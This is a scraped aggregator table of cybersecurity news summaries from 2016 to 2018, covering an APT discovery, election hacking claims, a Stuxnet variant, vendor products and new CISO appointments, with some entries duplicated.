What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2018-11-13 09:46:00 | Get 90% Off Your First Year of RemotePC, Up To 50 Computers for $6.95 (lien direct) | iDrive has activated a significant discount on their Remote access software RemotePC in these days leading into Black Friday. RemotePC by iDrive is a full-featured remote access solution that lets you connect to your work, home or office computer securely from anywhere, and from any iOS or Android device. Right now, their 50 computer package is 90% off or just $6.95 for your 1st year. If you've been thinking about remote access solutions, now is a good time to consider RemotePC. Learn more about it here. | Guideline | ||
|
2018-11-12 09:04:00 | Cylance researchers discover powerful new nation-state APT (lien direct) | When a Belgian locksmith attacked the Pakistani Air Force, researchers at Cylance sat up and took notice. The locksmith probably never knew his website had been taken over by a nation-state hacking group as a command-and-control server, nor that exploit-laden Microsoft Word documents crafted to spear-phish Pakistani Air Force officers were hosted there for more than six months.[ Keep up with 8 hot cyber security trends (and 4 going cold). Give your career a boost with top security certifications: Who they're for, what they cost, and which you need. | Sign up for CSO newsletters. ] The Belgian locksmith was just a pawn in a global game of cyberespionage fought by a new nation-state hacking group, and while the target in this operation was Pakistan - both nuclear-armed and a haven for terrorists in the region - the incredibly sophisticated layers of misdirection used by the malware to mislead and delay forensics analysis worries security researchers, who say these attack tools could be deployed against anyone else in the world at any time. | Guideline | ||
|
2018-11-05 08:42:00 | (Déjà vu) Republican Kemp accuses Georgia Democrats of hacking but provides no proof (lien direct) | Toss around accusations of a failed attempt to hack a state's voter registration system - without actually providing any proof - that's one way to really stir things up right before the midterm elections.That is what Brian Kemp, Georgia's current secretary of state - who is also the Republican candidate for governor - did on Sunday. With the midterm elections just a few days away, Kemp accused the Democratic Party of Georgia of hacking the state's voter registration system. Democrat Stacey Abrams, his opponent, called it “a reckless and unethical ploy” to mislead voters. | Hack Guideline | ||
|
2018-11-05 08:42:00 | (Déjà vu) Republican Kemp accused Georgia Democrats of hacking but provided no proof (lien direct) | Toss around accusations of a failed attempt to hack a state's voter registration system – without actually providing any proof, that's one way to really stir things up right before the midterm election.That is what Brian Kemp, Georgia's current secretary of state – who is also the Republican candidate for governor, did on Sunday. As you know, midterm elections are on Tuesday. So right before the election, Kemp accused the Democratic Party of Georgia of hacking. Democrat Stacey Abrams, his opponent, called it “a reckless and unethical ploy” to mislead voters. | Hack Guideline | ||
|
2018-11-04 09:19:00 | (Déjà vu) Meaner, more violent Stuxnet variant reportedly hits Iran (lien direct) | Stuxnet allegedly has a vicious little brother, or perhaps it is a malicious cousin; the complex malware was likened to being similar to Stuxnet but “more violent, more advanced and more sophisticated.”Iran, according to the Times of Israel, admitted that its “infrastructure and strategic networks” were hit by a meaner, leaner version of Stuxnet. A TV news report added that the Iranians are “not admitting, of course, how much damage has been caused.”The report came after Iranian Supreme Leader Ayatollah Ali Khamenei said Iran needed to step up efforts to fight enemy “infiltration.” Reuters also reported that Gholamreza Jalali, the head of Iran's civil defense agency, said, “Recently we discovered a new generation of Stuxnet which consisted of several parts ... and was trying to enter our systems.” Jalali didn't go into more detail. | Malware Guideline | ||
|
2018-11-04 09:19:00 | (Déjà vu) Meaner, more violent Stuxnet variant reportedly hit Iran (lien direct) | Stuxnet allegedly has a vicious little brother, or perhaps it is a malicious cousin; the complex malware was likened to being similar to Stuxnet but “more violent, more advanced and more sophisticated.” Iran, according to the Times of Israel, admitted that its “infrastructure and strategic networks” were hit by a meaner, leaner version of Stuxnet. A TV news report added that the Iranians are “not admitting, of course, how much damage has been caused.”The report came after Iranian Supreme Leader Ayatollah Ali Khamenei said Iran needed to step up efforts to fight enemy “infiltration.” Reuters also reported that Gholamreza Jalali, the head of Iran's civil defense agency, said, “Recently we discovered a new generation of Stuxnet which consisted of several parts ... and was trying to enter our systems.” Jalali didn't go into more detail. | Malware Guideline | ||
|
2018-10-22 14:04:00 | BrandPost: The Answer to Cyber Threats: People or Technology? (lien direct) | A new global survey by Ponemon and ServiceNow of nearly 3,000 cybersecurity professionals reveals that more than half the companies have experienced a breach in the past year. Compounding this issue: the volume of cyberattacks continue to increase, and the industry is facing a shortage of qualified security pros.But experts agree that hiring more people isn't necessarily the answer to solving this cyber threat puzzle. In this session Bob Bragdon, Senior Vice President and Publisher of CSO, and Myke Lyons, Security Transformational Leader at ServiceNow, explore the answers. | Threat Guideline | ||
|
2018-10-19 11:22:00 | (Déjà vu) Trend Micro shines a light on its new cybersecurity solutions (lien direct) | Last week, Trend Micro came to Boston for its annual Trend Insights industry analyst event. The company provided an overview of its business, products, and strategy. Here are a few of my take-aways: Trend Micro is prepared for the next chapter in endpoint security. To maintain its market leadership, Trend Micro is rolling out Apex One, its newest endpoint security product. Apex One provides more prevention/detection capabilities while consolidating all endpoint security functions onto a single agent. Trend Micro has also decided to swim against the industry tide by including EDR as part of its core commercial endpoint security product (note: EDR requires a licensing change), thus all customers who upgrade will get Trend Micro EDR, alleviating the need to shop elsewhere. Apex One will be an easy decision for existing Trend Micro customers and may be an attractive alternative for CISOs looking for an endpoint security solution will all the bells and whistles. Trend Micro product strategy: Better together. Trend Micro talks about connected threat defense, which brings together several its individual endpoint, network, and cloud products together as an integrated cybersecurity technology architecture. Good timing, as ESG research indicates that 62% of organizations would be willing to buy a majority of their cybersecurity products from a single enterprise-class vendor. For example, TippingPoint IDS/IPS is tightly integrated with Deep Discovery, Trend Micro's malware detection sandbox, while Deep Security, Trend Micro's cloud workload security offering, integrates with both of these products. As part of its business strategy, Trend Micro is working with customers to replace discrete point tools with Trend Micro products and reap integration benefits such as improved threat prevention/detection while streamlining security operations. Moving toward managed services. While Trend Micro engineered its EDR offering for ease of use, it recognizes that many organizations don't have the resources or skills to deploy, learn, or operate detection/response tools on their own. To work with these customers, Trend Micro is rolling out a managed detection and response service (MDR) as a complement to its products. Furthermore, Trend Micro is spinning out a new company called Cysiv, which offers several other advanced managed security services. With these moves, Trend Micro is demonstrating that it wants to play a direct role in the growing market for security services – rather than an indirect role as an arms dealer alone. All in on cloud security. Trend Micro jumped on the server virtualization and cloud computing bandwagons early by forming tight partnerships with VMware, Amazon, and Microsoft. Now that every other established vendor and VC-backed startup is all in on the cloud, Trend Micro is moving beyond basic cloud security support. For example, Trend Micro cloud security products are tightly-coupled with its connected threat defense for prevention/detection. From a cloud perspective, Trend Micro has gotten very familiar with application developers and DevOps to make sure that Trend Micro cloud security products fit seamlessly into a CI/CD pipeline. Trend Micro has also expanded its purview to cover containers micro-services, and even cloud-based application security. In this way, Trend Micro is aligning with cloud innovation and culture – not just hawking security products. More business investment. Over the past five years, Trend Micro business has gone through some significant shifts. For example, a larger percentage of the company's revenue comes from commercial sales rather than consumer sales, while Trend Micro has seen rapid market growth in North America. Trend Micro will hire engineers, expand sales staff, and service channel partners to keep this momentum going. | Malware Threat Guideline | ||
|
2018-10-19 11:22:00 | (Déjà vu) Cybersecurity Trends – With Trend Micro (lien direct) | Last week, Trend Micro came to Boston for its annual Trend Insights industry analyst event. The company provided an overview of its business, products, and strategy. Here are a few of my take-aways: Trend is prepared for the next chapter in endpoint security. To maintain its market leadership, Trend Micro is rolling out ApexOne, its newest endpoint security product. ApexOne provides more prevention/detection capabilities while consolidating all endpoint security functions onto a single agent. Trend has also decided to swim against the industry tide by including EDR as part of its core commercial endpoint security product, thus all customers who upgrade will get Trend EDR, alleviating the need to shop elsewhere. ApexOne will be an easy decision for existing Trend Micro customers and may be an attractive alternative for CISOs looking for an endpoint security solution will all the bells and whistles. Trend product strategy: Better together. Trend talks about connected threat defense which brings together several its individual endpoint, network, and cloud products together as an integrated cybersecurity technology architecture. Good timing as ESG research indicates that 62% of organizations would be willing to buy a majority of their cybersecurity products from a single enterprise-class vendor. For example, TippingPoint IDS/IPS is tightly integrated with Deep Discovery, Trend's malware detection sandbox while Deep Security, Trend's cloud workload security offering integrates with both of these products. As part of its business strategy, Trend is working with customers to replace discrete point tools with Trend products and reap integration benefits like improved threat prevention/detection while streamlining security operations. Moving toward managed services. While Trend engineered its EDR offering for ease-of-use, it recognizes that many organizations don't have the resources or skills to deploy, learn, or operate detection/response tools on their own. To work with these customers, Trend Micro is rolling out a managed detection and response service (MDR) as a complement to its products. Furthermore, Trend is spinning out a new company called Cysiv which offers several other advanced managed security services. With these moves, Trend is demonstrating that it wants to play a direct role in the growing market for security services – rather than an indirect role as an arms dealer alone. All in on cloud security. Trend Micro jumped on the server virtualization and cloud computing bandwagons early by forming tight partnerships with VMware, Amazon, and Microsoft. Now that every other established vendor and VC-backed startup are all-in on the cloud, Trend is moving beyond basic cloud security support. For example, Trend cloud security products are tightly-coupled with its connected threat defense for prevention/detection. From a cloud perspective, Trend has gotten very familiar with application developers and DevOps to make sure that Trend cloud security products fit seamlessly into a CI/CD pipeline. Trend has also expanded its purview to cover containers micro-services, and even cloud-based application security. In this way, Trend Micro is aligning with cloud innovation and culture – not just hawking security products. More business investment. Over the past 5 years, Trend Micro business has gone through some significant shifts. For example, a larger percentage of the company's revenue comes from commercial sales rather than consumer sales, while Trend has seen rapid market growth in North America. Trend Micro will hire engineers, expand sales staff, and service channel partners to keep this momentum going. In my humble opinion, Trend Micro remains a bit of a diamond in the rough – its security expertise and advanced techno | Malware Threat Guideline | ||
|
2018-09-19 07:00:00 | BrandPost: Cybercriminals Shift Tactics to Keep a Low Profile (lien direct) | Over the past several years, cyberattacks have become more targeted and sophisticated. Cybercriminals have begun to augment their attacks with advanced technologies, such as machine learning and automation, to increase the speed and efficiency of attacks, as well as to expand the number of potential victims by being able to identify and target multiple vulnerabilities. They have also expanded pay-as-you-go “as a service” attack models to make it easier to proliferate attacks. Cybercriminals have also demonstrated their increased prowess at highly-disruptive public attacks, taking large numbers of organizations, and even segments of the Internet, offline on a regular basis. However, while tactics such as DDoS and ransomware can have a major impact on a network, their disruptive nature typically leads to fairly quick remediation efforts. | Ransomware Guideline | ||
|
2018-09-06 02:30:00 | EDR is dead! Long live XDR! (lien direct) | Endpoint detection and response (EDR) has been an important technology for security professionals as they attempt to find suspicious activity, or at least traces of it, on endpoints and hosts. Cybersecurity itself is as old as computers, but the EDR segment is still in its infancy with the first solutions dating back only about five years or so.The technology works by monitoring the endpoint and then storing the data in a centralized repository where analysis can be done to detect a threat. Typically, EDR solutions require a software agent to be installed on the host system to provide the data used in monitoring and reporting.EDR has been critical for advanced protection, as more threats are being directed at the user. In fact, one of the industry's leading penetration testers recently told me that he can normally breach an organization within an hour by attacking the user and compromising the endpoint. Also, Windows is still the most widely used operating system in the business world, and many of its internal features are used by threat actors to breach that computer and others. | Threat Guideline | ||
|
2017-05-01 12:41:00 | Finance and government veteran Mark Morrison joins OCC as chief security officer (lien direct) |
The equity derivatives clearing organization OCC has hired Mark Morrison as OCC
Mark Morrison, senior vice president and CSO, OCC
 In this new position, Morrison will report to OCC's executive vice president and chief risk officer John Fennell. "To deliver world-class risk management, clearance and settlement services, we must ensure the confidentiality, availability, and integrity of our systems on behalf of market participants in our role as a Systemically Important Financial Market Utility," said Craig Donohue, OCC executive chairman and chief executive officer in a press release. "With over 35 years of experience in the field of information and cyber security, Mark brings a high level of expertise to our risk management team. His leadership will help OCC continue to integrate information security best practices into our service offerings, reduce systemic risks, and safeguard the integrity of the markets we clear."To read this article in full or to leave a comment, please click here |
Guideline | ||
|
2017-04-28 09:37:00 | Cyber Resilience 2.0, now shipping (lien direct) | The latest 'version' of cyber resilience includes "testing", according to a new report published by Cybersecurity Ventures. (Disclaimer: Steve Morgan is the CEO and founder of Cybersecurity Ventures.)At a recent cyber resilience 'Think Tank' held in San Francisco during RSA Conference 2017, the heads of IT security, CISOs, cybersecurity industry experts, and vendor executives gathered to come up with a new definition of an old term.The report states that cyber resilience is an organization's capacity to adapt to adverse cyber events-whether the events are external or internal, malicious or unintentional-in ways that maintain the confidentiality, integrity, and availability of whatever data and service are important to the organization.To read this article in full or to leave a comment, please click here | Guideline | ||
|
2017-04-28 06:05:00 | (Déjà vu) University of Utah hires Randall Arvay as CISO (lien direct) | On May 22, Randall (Randy) J. Arvay, will become the University of Utah's new chief information security officer (CISO). Arvay is currently CISO at Mississippi Medical Center. Arvay is a certified information systems security professional, project management professional and has top-secret Department of Defense clearance.Earlier, Arvay was chief of the cybersecurity and quality assurance in the Joint Spectrum Center for the Defense Information Systems Agency (DISA), where he was accountable for all cyber operations in all technical and non-technical aspects of cyberspace and overall information assurance, risk management and regulatory compliance.To read this article in full or to leave a comment, please click here | Guideline | ||
|
2017-04-21 04:00:00 | Serenova hires Stuart Clark as its first CISO (lien direct) | Serenova, a contact-center-as-a-service provider, has named Stuart Clark as its first chief information security officer (CISO). A key goal of Clark in his new role will be to standardize and scale security best practices to support the company's growth. He will oversee Serenova's IT and security organization and have responsibility for driving IT strategy and innovation to scale the company's information and security system capabilities."We are seeing a new wave of cloud adoption as on-premises solutions continue to fall away, and security is now top of mind particularly in areas like financial services and healthcare where contact centers are growing," said Vasili Triant, CEO of Serenova, in a press release. "Creating the role of CISO and bringing on someone of Stuart's caliber demonstrates our unwavering commitment to protecting our customer's information assets as they make this move to cloud as well as assets of our entire company. Stuart's expertise, track record and breadth of experience across the information technology landscape means he is the right leader to join our world-class executive team."To read this article in full or to leave a comment, please click here | Guideline | ||
|
2017-04-21 03:30:00 | IDG Contributor Network: Night at the information security museum (lien direct) | Earlier this week, Ira Winkler wrote What security practitioners can learn from the United's failures. He astutely noted that organizations should learn from failure, and ideally the failure of others. I'll take his lead and provide another learning opportunity for information security professionals.Physical security is a fundamental part of information security. In fact, operating systems base much of their security controls on an assumed secure physical infrastructure.Museums are a great example of where effective physical security comes into play. Like information security teams, museum security is often understaffed with limited budgets.To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-10-10 04:48:00 | Terror suspect\'s locked iPhone could lead to a second Apple-FBI showdown (lien direct) | The FBI could be gearing up for another battle with Apple.In the wake of a mass stabbing at a Minnesota mall that was linked to the terrorist group ISIS, the FBI is looking for answers on a passcode-protected iPhone.“Dahir Adan's iPhone is locked,†FBI special agent Rich Thornton told reporters at a press conference, according to Wired. “We are in the process of assessing our legal and technical options to gain access to this device and the data it may contain.â€To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-10-06 13:20:00 | IDG Contributor Network: Time to kill security awareness training (lien direct) | October is National Cyber Security Awareness Month. I am hoping you will join me in a national program to kill cybersecurity awareness training programs. I don't know who came up with the concept of “security awareness trainingâ€, but it has reached the end of its utility and should be replaced with something else. Is all we want is for users to be “aware†of security issues? Don't we want them to be educated enough to be active parts of the solutions?I looked into the history of “security awareness trainingâ€. Did we inherit it from the pioneers?To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-10-06 12:27:00 | Why cybersecurity spending will drive business digitization (lien direct) | The days of CEOs regarding data protection technologies and staff as a budget drain and operating tax that stifles innovation are over. Galvanized by high-profile breaches, companies are shelling out more money to shore up corporate defenses. CEOs also recognize that security is table stakes for building digital products and are entrusting their CISOs with more responsibilities.[ Related: Security challenge: Wearing multiple hats in IT ]Fifty-nine percent of 10,000 C-Suite executives polled by PwC for the new Global State of Information Security Survey said they are investing more in cybersecurity, including data analytics, real-time monitoring, authentication tools that include biometrics and managed security services (MSS). David Burg, PwC's U.S. and global leader of cybersecurity and privacy, says anecdotal evidence also suggests that companies are turning to CISOs to build security into software, including anything from mobile applications to connected cars that exchange information with smartphones.To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-10-06 03:27:00 | Business transformation proves to be a catalyst for cybersecurity spending (lien direct) | As enterprises accelerate their use of cloud computing, online services, and ready themselves for internet of things deployments, they are finding themselves strained to find the cybersecurity talent and security tools needed to secure these efforts. That's one of the most important takeaways from the Global State of Information Security Survey (GSISS) 2017 -- a worldwide study conducted by PwC, CIO and CSO released today. According to the GSISS survey, 59 percent of respondents say they are boosting their security spending as a result of their increased use of digital technologies, and retooling their business models to provide customers, employees, and partners evermore digital services and apps. These security efforts include increased investments in cloud computing environments, data monitoring, as well as managed security services. The survey was conducted online from April 4, 2016 to June 3, 2016.To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-10-05 10:07:00 | Crisis planning: 6 ways to put people first (lien direct) | If your business is located in the southeastern U.S., you're probably bracing for hurricane Matthew, which as of this writing is headed for Florida after making landfall in Cuba. All-too-familiar with the havoc a hurricane can wreak, you likely have a battle-tested plan for dealing with such storms and their aftermath.To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-10-04 11:04:00 | War stories: the vulnerability scanning argument (lien direct) | Over the last couple of decades I have had all sort of different jobs. I have to count myself as rather fortunate for the experiences I have had along the way. They really went a long way to teach me some valuable lessons. Also, in some cases, they taught me how to hold my tongue.In one such job years ago, I was working on implementing a company wide vulnerability scanning platform. As you might imagine, especially if you have done this sort of project before, there was some land mines I had to contend with in due course.At this particular job there were all sorts of different business units who acted as individual fiefdoms and had little interest in having their system scanned by anyone. “We have a firewall, we're fine†one team lead had grouched at me. “We have detection capabilities and we'll know if you scan our systems."To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-10-04 10:41:00 | 4 questions for Virtual Health\'s Dan Bart (lien direct) | Dan Bart has joined cloud-based health care technology startup Virtual Health in the newly-created role of executive vice president of information security and implementation, reporting to CEO Adam Sabloff.This role is Bart's first foray into the private sector, and he will be responsible for leading all of Virtual Health's information security efforts, overseeing cybersecurity policies and procedures, as well as optimizing the implementation of the company's solutions to best support client needs and protect sensitive client data.Prior to joining Virtual Health, Bart served more than 13 years at the Defense Information Systems Agency where he was was responsible for the implementation and operation of information systems designed to defend the DoD information network and protect classified data of critical value to national security. He held numerous management positions at DISA overseeing and optimizing cyber situational awareness systems, field communications, NetOps, secure configuration management systems and other critical infrastructure for the Defense Information Systems Agency.To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-10-03 18:37:00 | Hutton Hotel removes unwanted malware guest (lien direct) | The long sorted list of companies that have had their payment systems has added a new victim to it's ranks. This past Friday the upscale Hutton Hotel, a stones throw from Vanderbilt University in Nashville, disclosed that their payment processing systems in their hotel had been compromised by ne'er do wells. I think we have arrived at the point where companies that have payment systems that have not been reviewed should assume that they're compromised until proven otherwise. A dour assessment of things. But, when you consider that companies like Hard Rock, Target and even Trump Hotels (twice) suffered similar compromises it really leads one to assume that this is an activity required for any information security team. If you are responsible for a paymentTo read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-09-30 09:07:00 | IDG Contributor Network: Treasures attackers look for in the sea of email (lien direct) | As we dive into October, cybersecurity awareness month, there are lots of strategies to help us all become stronger swimmers in the digital waters. Given that there are 112 billion business emails sent around the world every day, that is one huge ocean that everyone can learn how to better navigate.Since its inception, email has become mission critical, and so many necessities beyond mail service have grown up along with it. Enterprises have become burdened by the complexities of email, which additionally requires the added protections of encryption gateways, spam filters, phishing protections, and much more.In order to attack all of the issues of email security in the age of digital disruption, you first have to know what is beneath the rough seas.To read this article in full or to leave a comment, please click here | Guideline | APT 32 | |
|
2016-09-29 15:00:00 | (Déjà vu) BrandPost: Automating the Threat Defense Lifecycle What the Heck does THAT Mean? (lien direct) | When we introduced our strategy at FOCUS '15, at its core a simple concept: create integrated security systems to automate the threat defense lifecycle so you can address more threats, faster, with fewer resources. With the recent announcement of our strategic partnership with TPG we want to further define our strategy and show how we are uniquely leading the market, making IT security as dynamic and responsive as today's most dangerous threats.[1]To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-09-29 10:36:00 | IDG Contributor Network: Anatomy of an insider attack (lien direct) | Insider threats are often addressed in blogs, articles, and books. But it isn't always easy to tell the story to business leaders and their employees. An episode of one of my favorite shows included a character taking steps any employee can complete in an unprepared organization. Let's run through the plot (a good scenario for management) and then take a look at what would have prevented each step in the attack.The attack Chris was tasked by an external attacker, one who had leverage over her, to steal legal documents related to a civil action. The attacker-we'll call him Bill-provided Chris with a USB drive loaded with malware. The malware was designed to extract login information from a target system.To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-09-28 05:47:00 | Former Microsoft CISO joins bio-electronics company board of directors (lien direct) | Charles McNerney, general manager of retail technology at Microsoft, and former CISO in its online services division, has been appointed to the board of directors of Nativis, Inc., a Seattle-based clinical stage bio-electronic company. Founded in 2002, Nativis has invented and patented a technology that uses precisely targeted, ultra-low radio frequency energy (ulRFE) to specifically regulate metabolic pathways on the molecular and genetic levels - without chemicals, radiation or drugs – delivered via a simple-to-use non-invasive device called Nativis Voyager®. (Watch the video below for an explanation of the Nativis technology.) Nativis' initial focus is on the treatment of patients with brain cancer, and in the spring of 2015 Nativis partnered with Swedish Neuroscience Institute on a clinical trial to investigate the safety and efficacy of the Nativis Voyager RFE medical device in humans with recurrent glioblastoma multiforme, an aggressive brain tumor with a high rate of recurrence and a mortality rate of nearly 100 percent.To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-09-28 03:16:00 | HackerOne CEO: \'We\'re building the world\'s biggest security talent agency\' (lien direct) | Marten Mickos, a veteran executive with companies from MySQL to Sun, Nokia and HP, was not particularly excited about his meeting to explore a leadership role with HackerOne, a fledgling security company. Security is hard, it's unpleasant, it doesn't work very well. But he perked up fast after learning about HackerOne's crowdsourced model of finding and fixing security flaws – a model in which HackerOne plays a key matchmaking role between companies and ethical hackers in a rapidly growing marketplace of skills and needs. Those are still conducted through your platform, those private bounty programs?With increasing organization in the world, increasing internet access, good STEM education in many countries in the world, there is no practical limit to how many hackers we can find. We get them from India, Pakistan, Bangladesh, Russia, all the Russian-speaking countries, Western Europe, the U.S.A., Chile, Argentina. It's fantastic to see them because you suddenly realize that there are all these mostly young people who have a burning desire to make the world safer and, of course, make some money at the same time. They have such great intent and instincts about this. I don't think we'll run out of hackers ever. Just like in open source software, we have never run out of contributors.To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-09-27 06:13:00 | IDG Contributor Network: Cybersecurity: is it really a question of when, not if? (lien direct) | Last week I had a pleasure of speaking at the Financial Times Cybersecurity Summit in London about the origins of global cybercrime and the current challenges of the cybersecurity industry. The week before, I attended Gartner Security & Risk Management Summit, where Gartner's security experts and industry analysts presented a lot of exciting talks and reports about the current state of cybersecurity in the world.According to Gartner's Top 10 Security Predictions 2016, through 2020, 99 percent of vulnerabilities exploited will continue to be ones known by security and IT professionals for at least one year. Meanwhile, many companies and organizations spend huge amounts fighting mysterious APTs and zero-days. To better understand the subject, let's walk through some quick numbers and statistics about cybersecurity and cybercrime first.To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-09-27 04:24:00 | After Tesla: why cybersecurity is central to the car industry\'s future (lien direct) | The news that a Tesla car was hacked from 12 miles away tells us that the explosive growth in automotive connectivity may be rapidly outpacing automotive security.This story is illustrative of two persistent problems afflicting many connected industries: the continuing proliferation of vulnerabilities in new software, and the misguided view that cybersecurity is separate from concept, design, engineering and production.This leads to a 'fire brigade approach' to cybersecurity where security is not baked in at the design stage for either hardware or software but added in after vulnerabilities are discovered by cybersecurity specialists once the product is already on the market.To read this article in full or to leave a comment, please click here | Guideline | Tesla | |
|
2016-09-22 09:36:00 | IDG Contributor Network: Security\'s new training center, a first of its kind (lien direct) | Baltimore announced some exciting news yesterday. Electronic Technology Associates (ETA) and Cyberbit have partnered together in a new adventure, launching the first stand alone hands-on cybersecurity training center in the U.S.To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-09-22 04:00:00 | Over 6,000 vulnerabilities went unassigned by MITRE\'s CVE project in 2015 (lien direct) | In 1999, MITRE created the Common Vulnerabilities and Exposures (CVE) database as a way to standardize the naming of disclosed vulnerabilities. Seventeen years later, the CVE system is faced with bottlenecks and coverage gaps, as thousands of vulnerabilities go without CVE-ID assignments. These gaps are leaving business leaders and security teams exposed to vulnerabilities their security products, which rely on CVE-IDs to function and assess risk, don't even know exist in some cases. Before CVE existed, the public had access to IBM X-Force (1997) and the SecurityFocus' BID database, which was established around six months before CVE. Each had their own methods of tracking and disclosing vulnerabilities, and this led to a situation where there wasn't an easy way to determine if the different databases tracking such problems were referring to the same thing. MITRE Corporation, seeing an opportunity, created CVE to fix these issues.To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-09-21 03:22:00 | Security challenge: Wearing multiple hats in IT (lien direct) | Are you taking on multiple job responsibilities at your company, including some aspects of information security? If so, you're not alone. At many organizations, IT professionals are being asked to handle a variety of security tasks and functions. For them, wearing multiple hats can create both opportunities and stress.To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-09-20 05:34:00 | This hospital is moving to Amazon\'s cloud to protect its network (lien direct) | Since 2012 three Texas-based health care organizations have merged to create USMD Health System. During the past four years CIO Mike Yerrid has been on a mission to centralize and consolidate IT operations. And a big part of that is moving to Amazon's cloud.Yes, as a health care organization, USMD is subject to stringent regulations for protecting patient information, and yes it's moving to the public cloud. USMD isn't alone. “Health care organizations are becoming more comfortable with cloud technology,†says Lynne Dunbrack, leader of research firm IDC's Health Insights practice.+MORE AT NETWORK WORLD: 9 Keys to a HIPAA compliant cloud | From CSO: What to think about when moving to the cloud +To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-09-19 11:50:00 | BrandPost: Automating the Threat Defense Lifecycle. What the Heck Does THAT Mean? (lien direct) | When we introduced our strategy at FOCUS '15, at its core a simple concept: create integrated security systems to automate the threat defense lifecycle so you can address more threats, faster, with fewer resources. With the recent announcement of our strategic partnership with TPG we want to further define our strategy and show how we are uniquely leading the market, making IT security as dynamic and responsive as today's most dangerous threats.[1]To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-09-16 08:38:00 | Security leaders need to stop chasing “risk catnip†(lien direct) | How often do you indulge in “risk catnipâ€? Here's an example: The hardest problem in computer science is fighting the urge to solve a different, more interesting problem than the one at hand.- Nick Lockwood (@nicklockwood) August 18, 2016 That tweet earned over 3000 retweets and over 4000 likes. The chain of comments express understanding and offer more examples. The concept is similar the effect of catnip on felines. Some just can't resist. In security, I dubbed this “risk catnip.â€Â To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-09-16 05:00:00 | The CSO password management survival guide (lien direct) | By now we're all well aware of what makes a bad password … it's us. A glance at SplashData's annual reporting on the world's worst passwords shows just how laughably bad at creating passwords us humans really are. But what's worse, as Steve Ragan's analysis of leaked passwords shows, is that many passwords on the naughty list adhere to the carefully crafted password policies in use in companies today. How can security leaders do better? For one thing, we can stop blaming users, says Michael Santarcangelo. Instead, we can focus on providing them with technology that makes the job easier. That's where this guide comes in.To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-09-15 07:18:00 | McCain opposes splitting NSA and Cyber Command (lien direct) | The head of the Senate Armed Services Committee is threatening to block any nominee to head up the National Security Agency if the Obama administration follows through on a plan to decouple the spy agency from U.S. Cyber Command, the digital warfare unit established in 2009.[ Related: U.S. Cyber Command struggles to retain top cybersecurity talent ]At a hearing on cybersecurity and encryption this week, Sen. John McCain (R-Ariz.) argued for preserving the current "dual hat" operating structure with the spy agency and the cyber warfare organization co-located and under common leadership.To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-09-14 12:50:00 | Government, carmakers more worried than ever about vehicle cyber attacks (lien direct) | Automakers and legislators appear to be coming together on the need for greater cybersecurity for vehicles that are increasingly connected to the internet and controlled by ever-more sophisticated computer systems and software.Volkswagen today announced it will form a cybersecurity company headed by Yuval Diskin, the former head of Israel's security agency. The company, CyMotive Technologies, will be 40% owned by the German automaker and the rest will be controlled by Diskin and two other former leaders in Israel's Shin Bet intelligence agency.To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-09-14 02:58:00 | 9 biases killing your security program (lien direct) | I see what I want to see Image by ThinkstockWe're not always as rational in our decision-making as we'd like to think we are. This is often true in our daily decisions; from what you'd like to eat for lunch to the bigger decisions we make, such as what kind of car to buy to where we choose to live. These cognitive biases, or deviations from rational judgement, can affect every aspect of our decision-making. It'd be foolish to think such irrational thinking doesn't lead to a distorted view of cybersecurity risks, or inaccurate judgements in defending enterprise systems. Here's a (by no means all-inclusive) list of nine such cognitive biases that security professionals should especially remain aware.To read this article in full or to leave a comment, please click here |
Guideline | ||
|
2016-09-13 08:21:00 | IDG Contributor Network: Cyberwar is here! Offense, defense and \'special teams\' (lien direct) | If anyone is asleep at the switch and thinks cyber is just a fad or trend, then consider this: Ginni Rometty, chairman, president and CEO of IBM, recently said, “We believe that data is the phenomenon of our time. It is the world's new natural resource. It is the new basis of competitive advantage, and it is transforming every profession and industry. If all of this is true – even inevitable – then cybercrime, by definition, is the greatest threat to every profession, every industry, every company in the world.†Do I have your attention now?Analogies to NFL teams (offense, defense and special teams) as well as military special forces can be applied to organizing elite talent around a specific objective to the corporate cyber challenge each company faces.To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-09-12 09:52:00 | CISO Desk Reference Guide (lien direct) | Are you an aspiring, recently hired or promoted CISO looking for the definitive how-to guide for your position? Look no no further. An experienced CISO along with two security subject matter experts have authored a comprehensive modern day text -- 'CISO Desk Reference Guide: A practical guide for CISOs' -- which covers risk management, compliance, audit, IT security disciplines, cybersecurity extending to IoT (internet of things) devices, cyber insurance, staffing, board concerns, and everything in between.The three authors -- Bill Bonney, Gary Hayslip, and Matt Stamper -- state their decision to write the book came from the shared realization that the dramatic escalation in cyber threats was not going to peak any time soon. A recent report from Cybersecurity Ventures aligns with their thinking -- and predicts cybercrime damages will cost the world $6 trillion annually by 2021, up from $3 trillion last year.To read this article in full or to leave a comment, please click here | Guideline | ||
|
